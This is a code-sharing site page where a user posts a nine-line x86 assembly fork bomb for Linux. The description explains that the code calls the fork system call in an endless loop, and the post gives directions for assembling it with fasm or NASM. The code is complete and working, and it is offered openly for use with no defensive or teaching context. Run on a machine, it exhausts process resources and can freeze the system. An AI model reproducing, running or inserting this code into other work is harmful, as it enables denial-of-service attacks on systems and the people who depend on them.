Coder Profile - Show off your skills, get a coder profile.
 
 
 
code pin board Fork bomb for Linux in x86 assembly Download Source Code
Author Details Code Information
Hav0c ( Blast2K )

Pinned 4 Codes
Posted 0 Coding Articles

Send A Message
View Coders Profile
Language Assembly
Expires Never
Length 123 Characters (9 Lines)
Password no password
Description

simple fork bomb for Linux
It calls the system call SYS_FORK (2) and loops around. Basic shit. I used fasm for this code, but it can be assembled with NASM as well, you just need to replace the first 2 lines and change 'start' to '_start'.
  1. ;assembly with fasm
  2. ;fasm fork.asm
  3. format ELF executable
  4. entry start
  5. start:
  6.           push          0x2
  7.           pop          eax
  8.           int          0x80
  9.           jmp          start
code pin board Back To Code Pin Board Post New Code
Please login to post comments.
Page 1 of 1
 
 
Part of the MyPingle Network
Development Blog :: Make A Donation :: Contact Me
Terms & Conditions :: Privacy Policy :: Documents
Version 1.44.00
Copyright © 2007 - 2008, Scott Thompson, All Rights Reserved